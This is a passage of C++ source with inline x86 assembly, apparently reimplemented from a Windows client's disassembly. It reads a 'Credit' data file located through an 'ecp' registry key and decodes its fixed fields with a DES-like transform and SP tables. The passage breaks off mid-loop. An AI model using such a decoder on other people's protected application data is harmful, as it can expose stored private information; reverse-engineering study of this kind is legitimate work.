0x0C, 0x3A, 0x0D, 0x2B, 0x33, 0x10, 0x1B, 0x3D, 0x32, 0x28, 0x0D, 0x3B, 0x10, 0x33, 0x33, 0x2D,
0x24, 0x00, 0x1D, 0x39, 0x3D, 0x0E, 0x32, 0x2D, 0x23, 0x16, 0x19, 0x39, 0x20, 0x25, 0x36, 0x0F,
0x18, 0x07, 0x39, 0x38, 0x2D, 0x11, 0x36, 0x0B, 0x14, 0x27, 0x39, 0x3C, 0x08, 0x1B, 0x26, 0x0B
};
// key1..key8: eight 256-byte tables = 64 little-endian dwords each, the same
// shape as the eight lookup tables at 4581E4..4588E4 (0x100 bytes apart) that
// 00402D80 indexes with 6-bit values. The first entries of key1 (0x01010400,
// 0x00000000, 0x00010000, 0x01010404) match the DES SP1 box of the d3des
// implementation — presumably these are the binary's SP tables in order;
// confirm which C table corresponds to which address.
char key1[] =
{
0x00, 0x04, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x04, 0x01, 0x01,
0x04, 0x00, 0x01, 0x01, 0x04, 0x04, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x04, 0x00, 0x00, 0x00, 0x04, 0x01, 0x01, 0x04, 0x04, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00,
0x04, 0x04, 0x00, 0x01, 0x04, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x00, 0x00,
0x04, 0x04, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x00, 0x04, 0x00, 0x01, 0x00, 0x04, 0x01, 0x00,
0x00, 0x04, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x04, 0x04, 0x00, 0x01,
0x04, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x01, 0x04, 0x00, 0x00, 0x01, 0x04, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x04, 0x04, 0x00, 0x00, 0x04, 0x04, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x01, 0x00, 0x04, 0x04, 0x01, 0x01, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01,
0x00, 0x04, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00,
0x04, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x04, 0x01, 0x00, 0x04, 0x00, 0x00, 0x01,
0x00, 0x04, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x04, 0x04, 0x00, 0x01, 0x04, 0x04, 0x01, 0x00,
0x04, 0x04, 0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x04, 0x04, 0x00, 0x01,
0x04, 0x00, 0x00, 0x01, 0x04, 0x04, 0x00, 0x00, 0x04, 0x04, 0x01, 0x00, 0x00, 0x04, 0x01, 0x01,
0x04, 0x04, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x01
};
// Lookup table 2 of 8 (256 bytes = 64 dwords; see the note on key1).
char key2[] =
{
0x20, 0x80, 0x10, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x20, 0x80, 0x10, 0x00,
0x00, 0x00, 0x10, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20, 0x00, 0x10, 0x80, 0x20, 0x80, 0x00, 0x80,
0x20, 0x00, 0x00, 0x80, 0x20, 0x80, 0x10, 0x80, 0x00, 0x80, 0x10, 0x80, 0x00, 0x00, 0x00, 0x80,
0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x10, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20, 0x00, 0x10, 0x80,
0x00, 0x80, 0x10, 0x00, 0x20, 0x00, 0x10, 0x00, 0x20, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x20, 0x80, 0x10, 0x00, 0x00, 0x00, 0x10, 0x80,
0x20, 0x00, 0x10, 0x00, 0x20, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x10, 0x00,
0x20, 0x80, 0x00, 0x00, 0x00, 0x80, 0x10, 0x80, 0x00, 0x00, 0x10, 0x80, 0x20, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x20, 0x80, 0x10, 0x00, 0x20, 0x00, 0x10, 0x80, 0x00, 0x00, 0x10, 0x00,
0x20, 0x80, 0x00, 0x80, 0x00, 0x00, 0x10, 0x80, 0x00, 0x80, 0x10, 0x80, 0x00, 0x80, 0x00, 0x00,
0x00, 0x00, 0x10, 0x80, 0x00, 0x80, 0x00, 0x80, 0x20, 0x00, 0x00, 0x00, 0x20, 0x80, 0x10, 0x80,
0x20, 0x80, 0x10, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80,
0x20, 0x80, 0x00, 0x00, 0x00, 0x80, 0x10, 0x80, 0x00, 0x00, 0x10, 0x00, 0x20, 0x00, 0x00, 0x80,
0x20, 0x00, 0x10, 0x00, 0x20, 0x80, 0x00, 0x80, 0x20, 0x00, 0x00, 0x80, 0x20, 0x00, 0x10, 0x00,
0x00, 0x80, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x20, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x80, 0x20, 0x00, 0x10, 0x80, 0x20, 0x80, 0x10, 0x80, 0x00, 0x80, 0x10, 0x00
};
// Lookup table 3 of 8 (256 bytes = 64 dwords; see the note on key1).
char key3[] =
{
0x08, 0x02, 0x00, 0x00, 0x00, 0x02, 0x02, 0x08, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x08,
0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x08, 0x02, 0x02, 0x00, 0x00, 0x02, 0x00, 0x08,
0x08, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x08, 0x00, 0x00, 0x02, 0x00,
0x08, 0x02, 0x02, 0x08, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x08, 0x08, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x00, 0x00, 0x02, 0x02, 0x08, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x02, 0x00, 0x00, 0x00, 0x02, 0x08, 0x08, 0x00, 0x02, 0x08, 0x08, 0x02, 0x02, 0x00,
0x08, 0x02, 0x00, 0x08, 0x00, 0x02, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x02, 0x00, 0x08,
0x08, 0x00, 0x00, 0x00, 0x08, 0x02, 0x02, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
0x00, 0x02, 0x02, 0x08, 0x00, 0x00, 0x00, 0x08, 0x08, 0x00, 0x02, 0x00, 0x08, 0x02, 0x00, 0x00,
0x00, 0x00, 0x02, 0x00, 0x00, 0x02, 0x02, 0x08, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x08, 0x02, 0x02, 0x08, 0x00, 0x02, 0x00, 0x08,
0x08, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x08,
0x08, 0x02, 0x00, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x08, 0x08, 0x02, 0x02, 0x08,
0x08, 0x00, 0x00, 0x00, 0x08, 0x02, 0x02, 0x00, 0x00, 0x02, 0x02, 0x00, 0x08, 0x00, 0x00, 0x08,
0x00, 0x00, 0x02, 0x08, 0x08, 0x02, 0x00, 0x08, 0x08, 0x02, 0x00, 0x00, 0x00, 0x00, 0x02, 0x08,
0x08, 0x02, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x08, 0x00, 0x02, 0x02, 0x00
};
// Lookup table 4 of 8 (256 bytes = 64 dwords; see the note on key1).
char key4[] =
{
0x01, 0x20, 0x80, 0x00, 0x81, 0x20, 0x00, 0x00, 0x81, 0x20, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
0x80, 0x20, 0x80, 0x00, 0x81, 0x00, 0x80, 0x00, 0x01, 0x00, 0x80, 0x00, 0x01, 0x20, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x80, 0x00, 0x00, 0x20, 0x80, 0x00, 0x81, 0x20, 0x80, 0x00,
0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x01, 0x00, 0x80, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x01, 0x20, 0x80, 0x00,
0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x01, 0x20, 0x00, 0x00, 0x80, 0x20, 0x00, 0x00,
0x81, 0x00, 0x80, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0x20, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00,
0x00, 0x20, 0x00, 0x00, 0x80, 0x20, 0x80, 0x00, 0x81, 0x20, 0x80, 0x00, 0x81, 0x00, 0x00, 0x00,
0x80, 0x00, 0x80, 0x00, 0x01, 0x00, 0x80, 0x00, 0x00, 0x20, 0x80, 0x00, 0x81, 0x20, 0x80, 0x00,
0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x80, 0x00,
0x80, 0x20, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x81, 0x00, 0x80, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x20, 0x80, 0x00, 0x81, 0x20, 0x00, 0x00, 0x81, 0x20, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
0x81, 0x20, 0x80, 0x00, 0x81, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00,
0x01, 0x00, 0x80, 0x00, 0x01, 0x20, 0x00, 0x00, 0x80, 0x20, 0x80, 0x00, 0x81, 0x00, 0x80, 0x00,
0x01, 0x20, 0x00, 0x00, 0x80, 0x20, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x01, 0x20, 0x80, 0x00,
0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x20, 0x00, 0x00, 0x80, 0x20, 0x80, 0x00
};
// Lookup table 5 of 8 (256 bytes = 64 dwords; see the note on key1).
char key5[] =
{
0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x08, 0x02, 0x00, 0x00, 0x08, 0x02, 0x00, 0x01, 0x00, 0x42,
0x00, 0x00, 0x08, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x08, 0x02,
0x00, 0x01, 0x08, 0x40, 0x00, 0x00, 0x08, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x01, 0x08, 0x40,
0x00, 0x01, 0x00, 0x42, 0x00, 0x00, 0x08, 0x42, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00, 0x00, 0x40,
0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x08, 0x40, 0x00, 0x00, 0x08, 0x40, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x40, 0x00, 0x01, 0x08, 0x42, 0x00, 0x01, 0x08, 0x42, 0x00, 0x01, 0x00, 0x02,
0x00, 0x00, 0x08, 0x42, 0x00, 0x01, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42,
0x00, 0x01, 0x08, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x42, 0x00, 0x01, 0x08, 0x00,
0x00, 0x00, 0x08, 0x00, 0x00, 0x01, 0x00, 0x42, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x08, 0x02, 0x00, 0x01, 0x00, 0x42, 0x00, 0x01, 0x08, 0x40,
0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x08, 0x42, 0x00, 0x01, 0x08, 0x02,
0x00, 0x01, 0x08, 0x40, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x08, 0x42,
0x00, 0x01, 0x08, 0x42, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 0x01, 0x08, 0x42,
0x00, 0x00, 0x08, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x40, 0x00, 0x00, 0x00, 0x42,
0x00, 0x01, 0x08, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x01, 0x00, 0x40, 0x00, 0x00, 0x08, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x40, 0x00, 0x01, 0x08, 0x02, 0x00, 0x01, 0x00, 0x40,
};
// Lookup table 6 of 8 (256 bytes = 64 dwords; see the note on key1).
char key6[] =
{
0x10, 0x00, 0x00, 0x20, 0x00, 0x00, 0x40, 0x20, 0x00, 0x40, 0x00, 0x00, 0x10, 0x40, 0x40, 0x20,
0x00, 0x00, 0x40, 0x20, 0x10, 0x00, 0x00, 0x00, 0x10, 0x40, 0x40, 0x20, 0x00, 0x00, 0x40, 0x00,
0x00, 0x40, 0x00, 0x20, 0x10, 0x40, 0x40, 0x00, 0x00, 0x00, 0x40, 0x00, 0x10, 0x00, 0x00, 0x20,
0x10, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20, 0x10, 0x40, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x00, 0x10, 0x40, 0x00, 0x20, 0x00, 0x40, 0x00, 0x00,
0x00, 0x40, 0x40, 0x00, 0x10, 0x40, 0x00, 0x20, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x20,
0x10, 0x00, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x10, 0x40, 0x40, 0x00, 0x00, 0x40, 0x40, 0x20,
0x10, 0x40, 0x00, 0x00, 0x00, 0x40, 0x40, 0x00, 0x00, 0x40, 0x40, 0x20, 0x00, 0x00, 0x00, 0x20,
0x00, 0x40, 0x00, 0x20, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x20, 0x00, 0x40, 0x40, 0x00,
0x10, 0x40, 0x40, 0x20, 0x00, 0x00, 0x40, 0x00, 0x10, 0x40, 0x00, 0x00, 0x10, 0x00, 0x00, 0x20,
0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20, 0x10, 0x40, 0x00, 0x00,
0x10, 0x00, 0x00, 0x20, 0x10, 0x40, 0x40, 0x20, 0x00, 0x40, 0x40, 0x00, 0x00, 0x00, 0x40, 0x20,
0x10, 0x40, 0x40, 0x00, 0x00, 0x40, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x20,
0x10, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x40, 0x20, 0x10, 0x40, 0x40, 0x00,
0x00, 0x40, 0x00, 0x00, 0x10, 0x00, 0x40, 0x00, 0x10, 0x40, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x40, 0x40, 0x20, 0x00, 0x00, 0x00, 0x20, 0x10, 0x00, 0x40, 0x00, 0x10, 0x40, 0x00, 0x20,
};
// Lookup table 7 of 8 (256 bytes = 64 dwords; see the note on key1).
char key7[] =
{
0x00, 0x00, 0x20, 0x00, 0x02, 0x00, 0x20, 0x04, 0x02, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
0x00, 0x08, 0x00, 0x00, 0x02, 0x08, 0x00, 0x04, 0x02, 0x08, 0x20, 0x00, 0x00, 0x08, 0x20, 0x04,
0x02, 0x08, 0x20, 0x04, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x04,
0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x02, 0x00, 0x20, 0x04, 0x02, 0x08, 0x00, 0x00,
0x00, 0x08, 0x00, 0x04, 0x02, 0x08, 0x20, 0x00, 0x02, 0x00, 0x20, 0x00, 0x00, 0x08, 0x00, 0x04,
0x02, 0x00, 0x00, 0x04, 0x00, 0x00, 0x20, 0x04, 0x00, 0x08, 0x20, 0x04, 0x02, 0x00, 0x20, 0x00,
0x00, 0x00, 0x20, 0x04, 0x00, 0x08, 0x00, 0x00, 0x02, 0x08, 0x00, 0x00, 0x02, 0x08, 0x20, 0x04,
0x00, 0x08, 0x20, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x08, 0x20, 0x00,
0x00, 0x00, 0x00, 0x04, 0x00, 0x08, 0x20, 0x00, 0x00, 0x00, 0x20, 0x00, 0x02, 0x08, 0x00, 0x04,
0x02, 0x08, 0x00, 0x04, 0x02, 0x00, 0x20, 0x04, 0x02, 0x00, 0x20, 0x04, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x20, 0x00,
0x00, 0x08, 0x20, 0x04, 0x02, 0x08, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x08, 0x20, 0x04,
0x02, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00, 0x04, 0x02, 0x08, 0x20, 0x04, 0x00, 0x00, 0x20, 0x04,
0x00, 0x08, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x04,
0x00, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x00, 0x20, 0x04, 0x00, 0x08, 0x00, 0x00,
0x02, 0x00, 0x00, 0x04, 0x00, 0x08, 0x00, 0x04, 0x00, 0x08, 0x00, 0x00, 0x02, 0x00, 0x20, 0x00,
};
// Lookup table 8 of 8 (256 bytes = 64 dwords; see the note on key1).
char key8[] =
{
0x40, 0x10, 0x00, 0x10, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x40, 0x10, 0x04, 0x10,
0x00, 0x00, 0x00, 0x10, 0x40, 0x10, 0x00, 0x10, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,
0x40, 0x00, 0x04, 0x00, 0x00, 0x00, 0x04, 0x10, 0x40, 0x10, 0x04, 0x10, 0x00, 0x10, 0x04, 0x00,
0x00, 0x10, 0x04, 0x10, 0x40, 0x10, 0x04, 0x00, 0x00, 0x10, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x04, 0x10, 0x40, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x10, 0x40, 0x10, 0x00, 0x00,
0x00, 0x10, 0x04, 0x00, 0x40, 0x00, 0x04, 0x00, 0x40, 0x00, 0x04, 0x10, 0x00, 0x10, 0x04, 0x10,
0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x04, 0x10,
0x40, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x10, 0x40, 0x10, 0x04, 0x00, 0x00, 0x00, 0x04, 0x00,
0x40, 0x10, 0x04, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x10, 0x04, 0x10, 0x00, 0x10, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x40, 0x00, 0x04, 0x10, 0x00, 0x10, 0x00, 0x00, 0x40, 0x10, 0x04, 0x00,
0x00, 0x10, 0x00, 0x10, 0x40, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x10, 0x00, 0x00, 0x04, 0x10,
0x40, 0x00, 0x04, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x04, 0x00, 0x40, 0x10, 0x00, 0x10,
0x00, 0x00, 0x00, 0x00, 0x40, 0x10, 0x04, 0x10, 0x40, 0x00, 0x04, 0x00, 0x40, 0x00, 0x00, 0x10,
0x00, 0x00, 0x04, 0x10, 0x00, 0x10, 0x00, 0x10, 0x40, 0x10, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,
0x40, 0x10, 0x04, 0x10, 0x00, 0x10, 0x04, 0x00, 0x00, 0x10, 0x04, 0x00, 0x40, 0x10, 0x00, 0x00,
0x40, 0x10, 0x00, 0x00, 0x40, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x04, 0x10,
};

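int _tmain(int argc, _TCHAR* argv[])
{
    // Read the Credit file and run the block transform over its fixed fields,
    // in place. The (offset, length) pairs mirror the 004119E0 call sites in
    // the listing above: ebp+30h/20h, ebp+50h/20h, ebp+70h/10h, ebp+80h/10h,
    // ebp+8/28h. The decoded buffer is not printed here (original behaviour).
    char *p = readfile();
    encode(p + 0x30, 0x20);
    encode(p + 0x50, 0x20);
    encode(p + 0x70, 0x10);
    // Exactly once: the listing at 00414E3D shows a single call for this field.
    // The original C called encode(p + 0x80, 0x10) twice, which re-transforms
    // the already-decoded bytes and is not what the binary does.
    encode(p + 0x80, 0x10);
    encode(p + 0x8, 0x28);
    encode(p + 0xA4, 0x10);
    encode(p + 0xE4, 0x10);
    delete[] p;                          // readfile() returns a new[]'d buffer
    return 0;
}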

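char* readdir()
{
    // Read the install path from the registry and derive "<root>\bin\Credit".
    // Returns a new[]'d 1024-byte string owned by the caller; on any registry
    // error it shows a message box and exits the process (original behaviour).
    const DWORD cap = 1024;
    char *dir = new char[cap];
    DWORD dwType = REG_SZ;
    DWORD dwLength = cap;
    HKEY rp;
    if (RegOpenKeyA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Classes\\ecp\\", &rp) != ERROR_SUCCESS)
    {
        MessageBoxA(0, "打开注册表错误", "提示", 0);
        ExitProcess(0);
    }
    if (RegQueryValueExA(rp, "URL Protocol", 0, &dwType, (LPBYTE)dir, &dwLength) != ERROR_SUCCESS)
    {
        MessageBoxA(0, "读取注册表错误", "提示", 0);
        ExitProcess(0);
    }
    RegCloseKey(rp);                     // the original never released the key handle
    // REG_SZ data is not guaranteed to carry a terminating NUL; terminate inside
    // the buffer before any strlen/strcat touches it.
    if (dwLength >= cap)
    {
        dwLength = cap - 1;
    }
    dir[dwLength] = 0;
    // Strip the last three '\'-separated components (the original loop, now with a
    // lower bound so a value with fewer than three backslashes cannot index below 0).
    int l = (int)strlen(dir);
    int f = 3;
    while (f && l > 0)
    {
        l--;
        if (dir[l] == '\\')
        {
            f--;
        }
        dir[l] = 0;
    }
    // Append the fixed suffix only when it fits; an unconditional strcat could
    // write past the 1024-byte buffer for a long registry value.
    if (strlen(dir) + sizeof("\\bin\\Credit") <= cap)
    {
        strcat(dir, "\\bin\\Credit");
    }
    return dir;
}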

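char* readfile()
{
    // Read the first 0x168c bytes (the BytesToRead seen in the ReadFile call) of
    // the Credit file into a new[]'d buffer owned by the caller. Exits the process
    // with a message box if the file cannot be opened (original behaviour).
    const size_t size = 0x168c;
    char *buffer = new char[size];
    char *path = readdir();
    FILE *fp = fopen(path, "rb");
    delete[] path;                       // the original leaked readdir()'s string
    if (!fp)
    {
        MessageBoxA(0, "读取文件出错", "提示", 0);
        ExitProcess(0);
    }
    size_t got = fread(buffer, sizeof(char), size, fp);
    fclose(fp);
    // A short file left the tail of the buffer uninitialised in the original;
    // zero it so the fixed field offsets always read defined bytes.
    for (size_t i = got; i < size; i++)
    {
        buffer[i] = 0;
    }
    return buffer;
}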

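void encode(char *buffer, int len)
{
    // Transform `len` bytes of `buffer` in place, 8 bytes at a time: build a
    // half-reversed scratch copy of the block (encode1), pass it as encode2's
    // `key` argument while encode2 runs the block transform, then reverse the
    // halves of the block itself (encode3).  `len` is expected to be a
    // multiple of 8; a trailing partial block is left untouched rather than
    // running past the buffer (the original `while (len)` never terminated
    // for any other length).
    while (len >= 8)
    {
        char *p = encode1(buffer);
        encode2(buffer, p);
        encode3(buffer);
        delete[] p;                     // encode1 allocates with new[]; the original leaked one block per step
        len -= 8;
        buffer += 8;
    }
}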

char* encode1(char *buffer)
{
    // Return a new[]'d 8-byte copy of `buffer` in which the byte order of
    // each 4-byte half is reversed (0..3 -> 3..0, 4..7 -> 7..4).  `buffer`
    // is left unchanged; the caller owns the returned block.
    char *out = new char[8];
    for (int i = 0; i < 8; i++)
    {
        // (i & 4) picks the half, (3 - (i & 3)) mirrors the position inside it
        out[i] = buffer[(i & 4) | (3 - (i & 3))];
    }
    return out;
}

void encode3(char *buffer)
{
    // Reverse the byte order of each 4-byte half of the 8-byte block at
    // `buffer`, in place: bytes 0..3 become 3..0 and bytes 4..7 become 7..4.
    for (int lo = 0; lo < 8; lo += 4)
    {
        for (int i = 0; i < 2; i++)
        {
            char tmp = buffer[lo + i];
            buffer[lo + i] = buffer[lo + 3 - i];
            buffer[lo + 3 - i] = tmp;
        }
    }
}

void encode2(char *buffer, char *key)
{
    // One 8-byte block transform, transcribed from the client's disassembly
    // as MSVC x86 inline asm (Intel syntax).  Its shape -- a bit permutation
    // built from the 0x0F0F0F0F / 0xFFFF / 0x33333333 / 0x00FF00FF /
    // 0xAAAAAAAA swap masks, eight 64-entry tables (key1..key8) indexed by
    // 6-bit slices, 8 loop passes of two mixing rounds each, then the same
    // permutation undone in reverse order -- is the layout of a DES-style
    // round function with precomputed SP-boxes.  Treat that as an inference
    // to confirm against the tables, not as established by this code.
    //
    // Register / stack roles as the asm uses them:
    //   eax, edx    the two 32-bit halves of the block
    //   ecx         working half during the rounds
    //   esi         cursor over the round-key material (see note at its load)
    //   [esp+0x10]  loop counter, initialised to 8 (reuses the slot where
    //               &buffer was pushed)
    // `pass` and `key1`..`key8` are file-scope tables defined elsewhere in
    // this file.  Note that the block is read from `pass` ([esp+8] after the
    // three pushes) and written back to `pass` at the end; the `lea eax, key`
    // and `lea eax, buffer` below take the addresses of the pointer
    // variables themselves, not of the bytes they point to.
    //
    // NOTE(review): the three address pushes at the top are never popped
    // (only the four callee-saved registers plus one `pop ecx` are), so the
    // block leaves esp 8 bytes low; this relies on the compiler's epilogue
    // restoring esp from ebp.  All [esp+...] offsets below assume this exact
    // push sequence and MSVC's frame layout for this function -- confirm in
    // a debugger before reusing the code elsewhere.
    __asm
    {
        lea eax, pass                   ; push &pass
        push eax
        lea eax, key                    ; push &key (address of the char* variable)
        push eax
        lea eax, buffer                 ; push &buffer (address of the char* variable)
        push eax
        mov ecx, dword ptr [esp+8]      ; ecx = &pass
        push ebx                        ; save callee-saved regs used below
        push ebp
        push esi
        mov eax, dword ptr [ecx]        ; eax = pass[0..3]
        mov edx, dword ptr [ecx+4]      ; edx = pass[4..7]
        mov ecx, eax
        mov esi, edx
        shr ecx, 4                      ; swap nibbles between halves (0x0F0F0F0F step)
        and ecx, 0x0F0F0F0F
        and esi, 0x0F0F0F0F
        xor ecx, esi
        push edi
        xor edx, ecx
        mov dword ptr [esp+0x10], 8     ; loop counter = 8 passes (2 rounds each)
        shl ecx, 4
        xor eax, ecx
        mov esi, edx
        mov ecx, eax
        and esi, 0x0FFFF                ; swap 16-bit words between halves
        shr ecx, 0x10
        xor ecx, esi
        xor edx, ecx
        shl ecx, 0x10
        xor eax, ecx
        mov ecx, edx
        shr ecx, 2                      ; swap 2-bit groups (0x33333333 step)
        mov esi, eax
        and ecx, 0x33333333
        and esi, 0x33333333
        xor ecx, esi
        xor eax, ecx
        shl ecx, 2
        xor edx, ecx
        mov esi, eax
        mov ecx, edx
        and esi, 0x0FF00FF              ; swap bytes (0x00FF00FF step)
        shr ecx, 8
        and ecx, 0x0FF00FF
        xor ecx, esi
        mov esi, dword ptr [esp+0x1C]   ; esi = key-material cursor; this slot lies above the
                                        ; three pushes, so what it resolves to depends on the
                                        ; compiler's prologue -- confirm (expected: `key`)
        xor eax, ecx
        shl ecx, 8
        xor edx, ecx
        mov ecx, edx
        add edx, edx                    ; ecx = rotl(edx, 1)
        shr ecx, 0x1F
        or ecx, edx
        mov edx, ecx
        xor edx, eax                    ; swap odd bits between halves (0xAAAAAAAA step)
        and edx, 0xAAAAAAAA
        xor eax, edx
        xor ecx, edx
        mov edx, eax
        add eax, eax                    ; edx = rotl(eax, 1)
        shr edx, 0x1F
        or edx, eax
        L058:                           ; loop body: round on ecx -> edx, then round on edx -> ecx
        mov ebx, dword ptr [esi]        ; first key word
        mov eax, ecx
        mov edi, ecx
